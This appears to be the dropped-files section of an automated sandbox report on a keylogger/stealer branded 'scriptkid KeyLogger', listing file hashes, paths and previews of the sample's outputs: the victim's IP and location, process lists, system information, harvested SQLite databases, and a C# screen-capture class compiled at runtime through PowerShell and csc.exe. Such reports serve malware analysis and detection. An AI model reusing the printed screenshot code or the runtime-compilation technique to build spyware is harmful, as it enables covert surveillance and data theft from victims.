                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):453052
                                                                                                                                                                                                                                        Entropy (8bit):7.922137868500332
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:nkT+A4xFQVV6XsQ0PWgX+c19Gvq2SqH66z8CwpvsOz:nk8xFO4XsQ0eE+cWvq2SQ6dCK
                                                                                                                                                                                                                                        MD5:99360CEB87C585DCD4AAC6F260DD115C
                                                                                                                                                                                                                                        SHA1:43514D3105A9041E840EFC1C7106CE4C33602BAF
                                                                                                                                                                                                                                        SHA-256:58C184BD21EEE5D9BAB92A33A12C45918100C688B8B407057E2AB323AEE1AE6E
                                                                                                                                                                                                                                        SHA-512:08A2401E0AB1551BD6A3C145A3E90EB44C693D4259BC6F5B8C5994E8CFEFE6B425F5C77AE926CC1932BF0EF0CF5FBC1AE6A7B268B2969648EA3D2F98C835CA85
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):275
                                                                                                                                                                                                                                        Entropy (8bit):4.771733771688554
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:4DIn6FMpJ+EVeAFUN3Dk96ZnXEn54deMWo:4Q6FMn22UN3Dks1Un5T4
                                                                                                                                                                                                                                        MD5:B016933917CEE587F520C3D81CF4E0EB
                                                                                                                                                                                                                                        SHA1:3DE408E609F426B21DAAABA904A46C8A460C223C
                                                                                                                                                                                                                                        SHA-256:FD5E68B9B03CDC24ABC7CD685C0C2A49B2C8B61E94F8D3EAC23EC2103B657340
                                                                                                                                                                                                                                        SHA-512:45F15DCC8D1F32F4F6F7067364587D2DBBBA3B94AC00BE6266C07E377236D3532ABBC63A16E19DA4E9775530FA9D47532313C01629EF5F8EFAF4C91C95112D48
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:....... scriptkid KeyLogger . https://scriptkid.lol | .........======================================================================..173.254.250.89..United States..Killeen..America/Chicago..QuadraNet OMGITSFAST AS8100 QuadraNet Enterprises LLC
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with CRLF, CR line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):25254
                                                                                                                                                                                                                                        Entropy (8bit):4.629387689350764
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:ATiXIZbULeUTj7+PiWtnQq1Bygk/rSb4ndJNuGnI+3HJgA5Pq/aVNChYPqMvsAfc:LsZTYxPnzc1
                                                                                                                                                                                                                                        MD5:45305AFE4C16849799D9D7B9372CF4F3
                                                                                                                                                                                                                                        SHA1:FBA1107FA2D8F6EFE4D19B843BEF937F9109FC6A
                                                                                                                                                                                                                                        SHA-256:3C069EEF7713B8ED30435CF337FA9BA923318D96AFDD30A9A64C09B9290147ED
                                                                                                                                                                                                                                        SHA-512:8DA7DDEB9DAA86AE360160172B03886459F1304A2859DAB9E4EA8B428578469116D487D577010B1D6C6B7B62A91044C2E92AA56DEC9CF240DB7656365665BBAB
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:....... scriptkid KeyLogger . https://scriptkid.lol | .........======================================================================.....Image Name: System Idle Process...PID: 0...Session Name: Services...Session#: 0...Mem Usage: 8 K......Image Name: System...PID: 4...Session Name: Services...Session#: 0...Mem Usage: 180 K......Image Name: Registry...PID: 92...Session Name: Services...Session#: 0...Mem Usage: 82'856 K......Image Name: smss.exe...PID: 324...Session Name: Services...Session#: 0...Mem Usage: 1'240 K......Image Name: csrss.exe...PID: 408...Session Name: Services...Session#: 0...Mem Usage: 5'252 K......Image Name: wininit.exe...PID: 484...Session Name: Services...Session#: 0...Mem Usage: 7'236 K......Image Name: csrss.exe...PID: 492...Session Name: Console...Session#: 1...Mem Usage: 5'980 K......Image Name: winlogon.e
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:Algol 68 source, Unicode text, UTF-8 text, with CRLF, CR line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):143771
                                                                                                                                                                                                                                        Entropy (8bit):4.361348789395363
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:9i6oZBeX+DlX7z8oiEmi+B1HJXXaaTsB8xOQiG5rtGl2ynreAqUfI+AB8Pn6ygZH:9i69gLm
                                                                                                                                                                                                                                        MD5:7AE7C3CE86A51B2CC754AF2056D3215F
                                                                                                                                                                                                                                        SHA1:7726A9498F6A303895F86558BCFEFA0B3DD89CB6
                                                                                                                                                                                                                                        SHA-256:5CCC10BE816201008C706E081DBFCBF82E4E018F92EAAC18FB8D4B7FAD14F66A
                                                                                                                                                                                                                                        SHA-512:5D2D5FD33D3C47DD637A456DEB696AA78E51891DE225160373A05BCB4184F32F37A10301BDC9939FBCDBAD3A9C58AF99D714B7973F105162DD85F3095121FC82
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:....... scriptkid KeyLogger . https://scriptkid.lol | .........======================================================================..####System Info#### ......Host Name: user-PC...OS Name: Microsoft Windows 10 Pro...OS Version: 10.0.19045 N/A Build 19045...OS Manufacturer: Microsoft Corporation...OS Configuration: Standalone Workstation...OS Build Type: Multiprocessor Free...Registered Owner: hardz...Registered Organization: ...Product ID: 00330-71380-43655-AAOEM...Original Install Date: 03/10/2023, 10:57:18...System Boot Time: 25/09/2023, 12:29:46...System Manufacturer: 2352sH8Ugu3bnXf...System Model: C6Ykckwy...System Type: x64-based PC...Processor(s): 2 Processor(s) Installed.... [01]: Intel64 Family 6 Model 143 Stepping 8 GenuineIntel ~2000 Mhz...
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):196608
                                                                                                                                                                                                                                        Entropy (8bit):1.1211596417522893
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8wH0hL3kWieF:r2qOB1nxCkvSAELyKOMq+8wH0hLUZs
                                                                                                                                                                                                                                        MD5:0AB67F0950F46216D5590A6A41A267C7
                                                                                                                                                                                                                                        SHA1:3E0DD57E2D4141A54B1C42DD8803C2C4FD26CB69
                                                                                                                                                                                                                                        SHA-256:4AE2FD6D1BEDB54610134C1E58D875AF3589EDA511F439CDCCF230096C1BEB00
                                                                                                                                                                                                                                        SHA-512:D19D99A54E7C7C85782D166A3010ABB620B32C7CD6C43B783B2F236492621FDD29B93A52C23B1F4EFC9BF998E1EF1DFEE953E78B28DF1B06C24BADAD750E6DF7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                        Entropy (8bit):0.6732424250451717
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                                                                        MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                                                                        SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                                                                        SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                                                                        SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):155648
                                                                                                                                                                                                                                        Entropy (8bit):0.5407252242845243
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                                                                        MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                                                                        SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                                                                        SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                                                                        SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):155648
                                                                                                                                                                                                                                        Entropy (8bit):0.5407252242845243
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                                                                        MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                                                                        SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                                                                        SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                                                                        SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):51200
                                                                                                                                                                                                                                        Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                        MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                        SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                        SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                        SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                                        File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b6, 9 symbols, created Fri Nov 15 10:56:30 2024, 1st section name ".debug$S"
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1372
                                                                                                                                                                                                                                        Entropy (8bit):4.11411649177469
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:HREFq9movp+bTH1WwKjFytdNII+ycuZhN3akS5PNnqS+d:eT4EbT/KjUtdu1ul3a37qSe
                                                                                                                                                                                                                                        MD5:C848872ECFF1977DE4C441EF7DD1B883
                                                                                                                                                                                                                                        SHA1:5FCF6135678551183737333FE3BFC1C41725EC17
                                                                                                                                                                                                                                        SHA-256:160AB8C242F1F7BEC828B983E9EE82E8334E777C96B0CDC762D7AE96209FDC3B
                                                                                                                                                                                                                                        SHA-512:B03B641FBEECCB424CEDE57BF87088D15A7457CCCBC948C79A130A48A24C9748DD2D966CEE83737AE4B0B2B2C04F5D76447C2F0A5F8219E5E564D0C74C4C3E14
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:L....(7g.............debug$S........x...................@..B.rsrc$01........X.......\...........@..@.rsrc$02........P...f...............@..@........P....c:\Users\user\AppData\Local\Temp\bjhgmex2\CSC140859705554C19BC8B0399D26A87.TMP................yj.......7.t.............3.......C:\Users\user\AppData\Local\Temp\RES6BB9.tmp.-.<....................a..Microsoft (R) CVTRES...=..cwd.C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...b.j.h.g.m.e.x.2...d.l.l.....(.....L.e.g.a.
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):196608
                                                                                                                                                                                                                                        Entropy (8bit):1.1211596417522893
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8wH0hL3kWieF:r2qOB1nxCkvSAELyKOMq+8wH0hLUZs
                                                                                                                                                                                                                                        MD5:0AB67F0950F46216D5590A6A41A267C7
                                                                                                                                                                                                                                        SHA1:3E0DD57E2D4141A54B1C42DD8803C2C4FD26CB69
                                                                                                                                                                                                                                        SHA-256:4AE2FD6D1BEDB54610134C1E58D875AF3589EDA511F439CDCCF230096C1BEB00
                                                                                                                                                                                                                                        SHA-512:D19D99A54E7C7C85782D166A3010ABB620B32C7CD6C43B783B2F236492621FDD29B93A52C23B1F4EFC9BF998E1EF1DFEE953E78B28DF1B06C24BADAD750E6DF7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):13747712
                                                                                                                                                                                                                                        Entropy (8bit):7.99601949446881
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:393216:85CCDJlS/FyOUUGafnbRngsndGKLYHSJj:8oCytjGafSsdx4k
                                                                                                                                                                                                                                        MD5:4FD34971F2551E33806360BA5EE86E5E
                                                                                                                                                                                                                                        SHA1:A3F2FE7D770D45C0B98BDBDF3322614582E41D59
                                                                                                                                                                                                                                        SHA-256:E82FE9CE4FEC710C6F02DC3ED738E5A88955D4D938957EC2B49119D5018ECB81
                                                                                                                                                                                                                                        SHA-512:1C01226CB0A061675A8AF6DB24DEA570881BBD7A2D6C8E21AAF51884BF4B64A2011DCC881507FB0B0A0191F8DC180831833EB175F07D6FDEE72ED11748183281
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 39%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........................U.........&W.....&......&......&...............!......!.....Rich...........PE..d...Bs6g.........."....(.......................@..........................................`.....................................................<....0..............................@...................................@............................................text............................... ..`.rdata..............................@..@.data...`...........................@....pdata..............................@..@.rsrc........0......................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                        File Type:MSVC .res
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):652
                                                                                                                                                                                                                                        Entropy (8bit):3.111742667693586
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grylak7Ynqq5PN5Dlq5J:+RI+ycuZhN3akS5PNnqX
                                                                                                                                                                                                                                        MD5:E8796A8519AB83071DCB37AF7409968E
                                                                                                                                                                                                                                        SHA1:7CF86E87A7A2111E4F0C92CAA237176D6D983EF0
                                                                                                                                                                                                                                        SHA-256:8BADD01D143380B3129B85F0AF47219B369FD720891AB010AF52F79256A5595E
                                                                                                                                                                                                                                        SHA-512:79B22CF7B251FE7B00176C3D9A96F511ECFE59364A2246B61197D64AFB7D2D98E52600D038B2BC978A734C3DA50BB2AC62D6C0CFF72E9241FA0E344FCC31E376
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...b.j.h.g.m.e.x.2...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...b.j.h.g.m.e.x.2...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1004
                                                                                                                                                                                                                                        Entropy (8bit):4.154581034278981
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
                                                                                                                                                                                                                                        MD5:C76055A0388B713A1EABE16130684DC3
                                                                                                                                                                                                                                        SHA1:EE11E84CF41D8A43340F7102E17660072906C402
                                                                                                                                                                                                                                        SHA-256:8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
                                                                                                                                                                                                                                        SHA-512:22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (602), with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):605
                                                                                                                                                                                                                                        Entropy (8bit):5.402047841013756
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:p37Lvkmb6KOkqe1xBkrk+ikLZh0WZE3Z7:V3ka6KOkqeFkl3EJ7
                                                                                                                                                                                                                                        MD5:A47B13AA760E0B5628D18CDE7B249D6E
                                                                                                                                                                                                                                        SHA1:6BF21ABD3AC54CAB7AA5836837FF58AF18697E30
                                                                                                                                                                                                                                        SHA-256:32536B9399C820F852948B1C7EAA913B3D87ED1677304DC808F24A60C71EE50C
                                                                                                                                                                                                                                        SHA-512:6B3E60600C285F2C39BEDCF971AE71565FC6DB0DE9533D53DAFE7FE599FBBF71652C3DBDD09B80638DA1981C3573498779A883DE9DC045305C9E59C587309A69
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\bjhgmex2\bjhgmex2.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\bjhgmex2\bjhgmex2.0.cs"
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):4096
                                                                                                                                                                                                                                        Entropy (8bit):3.160106293721571
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:667oEAtf0KhzBU/9f6mtJKN0lpW1ul3a37q:+Nz0EmSOd1K
                                                                                                                                                                                                                                        MD5:4375FAB82D4BCAA367426B58F66079FD
                                                                                                                                                                                                                                        SHA1:FD7797070BFB34238CAAB7D834317AEB81CEB4CC
                                                                                                                                                                                                                                        SHA-256:D230A9541953213366A051064A18570D09C77ACBDFB9062F262CBD1C49A2AE35
                                                                                                                                                                                                                                        SHA-512:799224E7DC4C31B84EDDE403A91A071124E1232D2148405DA884473AE88833E7930A12C1378E6569DDD8A74913FBFCDEF4930DC5D037A2AA86A74D7E37D212F6
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (731), with CRLF, CR line terminators
                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                        Size (bytes):1152
                                                                                                                                                                                                                                        Entropy (8bit):5.490937268098361
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:KgtmkId3ka6KOkqeFkl3EJ6Kax5DqBVKVrdFAMBJTH:Jtxkka6NkqeFkl3EJ6K2DcVKdBJj
                                                                                                                                                                                                                                        MD5:A32101351599A2E1FB06FD507D14BCBB
                                                                                                                                                                                                                                        SHA1:261B78F0A0E8020C62170F429E3D95DA16E88FFE
                                                                                                                                                                                                                                        SHA-256:D10E3B17D9551666229F93202BEC17B3C860C7B1B124AF2472D0F7B9B28505DC
                                                                                                                                                                                                                                        SHA-512:FE9B272FBD7A4D9FF38C55094ACC149D7A11546C691E19707616AFEF6A19AA1E11558F6C915BE60BE2009BF28AFF0BFB07145CCEE111661D6CCBB740587002C8
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\bjhgmex2\bjhgmex2.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\bjhgmex2\bjhgmex2.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no lo
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):24189952
                                                                                                                                                                                                                                        Entropy (8bit):6.346346908201171
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:98304:CFUine3T2HszWM/LvOrN6hC0lxy6D5DKJBlZGODSr1YQaxLaIaiFrEF9o31g6d6T:lD+SWKOr4CeXDuHwODSw6uc
                                                                                                                                                                                                                                        MD5:D71750B08D81D33E6BEAD1CEB707BC4F
                                                                                                                                                                                                                                        SHA1:CEB0FE13317E7EF87377D385E9CF869343958971
                                                                                                                                                                                                                                        SHA-256:6D350FD6D807F267F5B615CF5937DABB99E5F30ED3B3310E1BF2AA2A34F93F8E
